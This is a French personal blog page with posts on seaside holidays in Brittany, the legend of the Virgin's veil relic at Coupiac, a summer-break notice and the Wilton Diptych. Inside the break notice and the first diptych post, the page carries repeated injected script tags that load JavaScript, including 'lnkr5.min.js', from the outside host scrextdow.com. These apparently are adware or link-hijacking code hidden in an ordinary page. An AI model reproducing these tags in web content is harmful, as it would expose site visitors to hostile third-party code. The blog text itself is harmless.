•  

     

     

    Souvenirs de vacances...

     

    La plage de Carnac, en fin de soirée samedi dernier...

     

     

     

    Cette année encore ce furent de belles vacances, nous avons bien profité de la plage ( châteaux de sable, pâtés etc... avec les petits) j'ai aussi pâtissé avec l'aînée de mes petites filles, je vous donnerai les recettes ultérieurement, nous avons joué à pleins de jeux de société.

     

     

     

    Souvenirs de vacances...

    Le ciel de mes vacances, quelques petits nuages blancs baguenaudent dans le bleu du ciel

     

     

     

    J'ai beaucoup lu, écouté de la musique et aussi visité la cathédrale de Vannes qui est magnifique.

     

     

     

    Souvenirs de vacances...

    La voilà, son clocher dépasse les maison qui sont lovées contre elle.

     

     

     

    Le jour de la rentrée, les trois enfants ont retrouvé leur école respective ils ont l'air contents, nous le sommes aussi bien entendu.

     

    Septembre a déjà coloré d'or et de roux quelques feuilles du cerisier et des deux noisetiers qui ont parsemés le gazon de noisettes que j'ai ramassé avec mes petits enfants. 

     

     

     

    Souvenirs de vacances...

    L'or de septembre dans le cerisier et les noisetiers du jardin...

     

     

     

    Liviaaugustae

     

     

     

     


    14 commentaires
  •  

     

     

     

    Je veux d'abord vous remercie pour tous vos petits mots sympas et vos vœux de bonnes vacances qui ont été exaucés, me voilà de retour après de belles et agréables vacances, le temps était très beau et le soleil présent, ingrédients indispensable pour les vacances.

     

    Pour commencer la semaine, je vous offre la belle histoire du voile de la Vierge et bien qu'elle n'arrête pas de faire de miracles, malgré toutes les merveilles qu'elle nous a offert, les hommes entêtés ne veulent rien savoir...

     

    Liviaaugustae

     

    Le voile de la Vierge...

     

     

    Coupiac (commune de l’Aveyron, France) possède, depuis un temps qui ne peut être inférieur à cinq siècles au moins, un important fragment d'un voile que la tradition a toujours considéré comme ayant appartenu à la Sainte Vierge. La fête officielle de Notre Dame du Saint Voile a toujours lieu le deuxième dimanche après Pâques.

     

    À 800 mètres au nord de Coupiac se trouve la chapelle Notre-Dame de Massiliergues : c'est là que fut caché, dans la terre, le Saint Voile pendant les guerres de Religion au XVIe siècle. La sainte relique fut ainsi soustraite au ravages des protestants dans la région par des personnes pieuses. Celles-ci la cachèrent dans un terrain attenant au cimetière de la paroisse. Elles comptaient la retirer après la guerre, mais la mort les surprit. Le lieu resta secret et la relique fut oubliée.

     

    La tradition raconte qu'un taureau du hameau voisin grattait continuellement la terre aux environs du cimetière et faisait entendre des gémissements extraordinaires. Ce taureau ne mangeait pas ; il était cependant très gras. Intrigués, les habitants creusèrent. Malgré l'humidité et un séjour très prolongé dans la terre, la relique était en parfait état de conservation.  

     

    En 1968, un oratoire, destiné à recevoir la châsse en cuivre doré contenant le Saint Voile, a été aménagé dans une dépendance du presbytère.

     

    La relique aurait la particularité de soigner les yeux malades.

     

     


    16 commentaires
  •  

     

     

    Pause estivale...

     

    (image internet)

     

     

     

    Blog en Pause

    Primo : pour des raisons techniques, mon ordi fait encore des siennes...

    Deusio : je pars samedi vers la côte, pour les vacances estivales, pour retrouver : « le ciel, le soleil et la mer... » comme le chantait autrefois François Deguelt.

    Je vous souhaite à tous un bel été

    Je vous retrouve à la rentrée de septembre, avec un ordi remis en forme...

    Liviaaugustae

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>


    17 commentaires
  •  

     

     

     

     

     

    Samedi et dimanche dernier, je vous ai présenté les deux volets du diptyque Wilton.

     

    Voici l'œuvre entière, elle est splendide en or, vermillon et bleu lapis-lazuli.

     

    Vous pourrez mieux vous rendre compte comment ce diptyque est conçu et comment les deux volets s'articulent, avec les explications de wikipédia...

     

    Liviaaugustae

     

     

     

    Diptyque Wilton...

    Le diptyque Wilton, avec ses deux volets.

     

     

     

    Le diptyque de Wilton est un petit retable portatif constitué de deux panneaux articulés peints des deux côtés, réalisé vers 1395-1399 par un maître anonyme, probablement anglais ou français.

     

    Représentatif du style gothique international, il est l'une des rares peintures religieuses anglaises du Moyen Âge tardif qui soient parvenues jusqu'à nous. Le diptyque, vraisemblablement commandité par Richard II d'Angleterre pour ses dévotions personnelles, représente ce dernier sur le panneau de gauche, s’agenouillant devant la Vierge et l'Enfant entourés de onze anges sur le panneau de droite.

     

     

     

    Le diptyque de Wilton est peint sur deux panneaux de chêne (sur un support caractéristique du Nord de l'Europe), insérés dans un cadre du même matériau, et joints par deux charnières qui permettent de le refermer, à la manière d'un livre. Ceci a d'ailleurs permis une bonne conservation des peintures intérieures, alors que les panneaux externes ont été détériorés par les manipulations qu’a subies l’œuvre.

     

    L’artiste a utilisé la technique de la tempera — l’œuf servant de liant aux pigments colorés —, alors commune en Italie. L’arrière-plan et certains détails sont réalisés à la feuille d’or, et l'œuvre a par endroits été travaillé en dessous des dorures pour en améliorer la qualité artistique. Les motifs de brocart des habits du panneau de gauche sont ainsi estampés et gravés. L'outremer naturel, qui domine sur le panneau de droite notamment pour les habits de la Vierge et des anges, provient du lapis-lazuli, une pierre semi-précieuse. La robe de Richard II a quant à elle été colorée au vermillon , un autre pigment très onéreux à l’époque

     

    Fermé, le diptyque présente sur le panneau de droite un cerf blanc, emblème de Richard II, couché sur des branches de romarin, dans un pré enherbé, sous un ciel d’or. Celui-ci porte autour de la gorge un collier doré en forme de couronne, où est attachée une chaîne à grosses mailles rectangulaires.

     

     

     

    Diptyque Wilton...

    Le verso du diptyque

     

    Je le trouve très beau aussi vu de l'extérieur.

     

     

     

    Sur l'autre panneau, très endommagé, se trouve un écu figurant les armes adoptées par Richard II à partir de 1395, et qui associent celles — supposées, puisque les blasons n'existaient pas au XIe siècle — d'Edouard le Confesseur et celles des rois d’Angleterre. Derrière l'écu se trouvent un heaume d’argent et une toque de cérémonie rouge surmontée d'un lion couronné.

     

    (texte et image wikipédia)

     

     

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>


    10 commentaires
  •  

     

     

     

     

    Hier, je vous ai présenté le volet gauche du diptyque Wilton.

     

    Je vous offre aujourd'hui le volet droit avec : la Vierge à l'Enfant aux anges bleus.

     

    Liviaaugustae

     

     

     

     

     

    « Heureuse es-tu, Sainte Vierge Marie, car de toi s'est levé le soleil de justice, le Christ notre Dieu. »

     

    Antienne de la messe en l'honneur de la Vierge

     

     

     

    Regard sur l'art chrétien...

    La Vierge à l'Enfant aux anges bleus est le volet droit du célèbre diptyque Wilton, par un anonyme français, vers 1377 ou 1396.Il évoque le mois de mai, le mois de Marie.

     

     

     

    Le volet droit du diptyque (retable à deux volets) présente un fond d'or sur lequel est gravé une profusion de petites croix gothiques : c'est comme une tenture royale devant laquelle se tient debout Notre-dame, simplement vêtue d'azur comme un beau ciel d'été, une couleur elle aussi typiquement gothique, peinte avec du lapis lazuli, pierre précieuse très prisée au Moyen-Âge.

     

    Elle porte un grand voile bleu sur une robe de même teinte que reprennent les aubes des onze anges, tous semblables avec leurs fins visages ni fille ni garçon. C'est comme une livrée céleste, qui procure un éblouissement de beauté, une sorte de reflet du bleu éternel du ciel du Paradis. Seul l'Enfant est drapé d'un tissus d'or. Les anges sont couronnés de roses (cette coutume médiévale est à l'origine du rosaire). Ils portent sur l'épaule gauche la broderie d'un cerf blanc couché, emblème personnel de Richard II d'Angleterre. Un des anges tient la bannière du Ressuscité.

     

    Le sol, vert très foncé, est émaillé de fleurs bleue pâles et rose pâle : un vrai jardinet de paradis tel qu'on les aimait au Moyen-Âge. Cette symphonie de bleus de différentes valeurs, et tous ces visages entourant Jésus rendent cette œuvre envoûtante.

     

     

     

    Regard sur l'art chrétien...

    Les anges adolescents de ce peintre ont des visages empreints de tout le raffinement de l'art gothique.

     

    Marie-Gabrielle Leblanc

     

     

     

     

     

     

     


    12 commentaires



    Suivre le flux RSS des articles
    Suivre le flux RSS des commentaires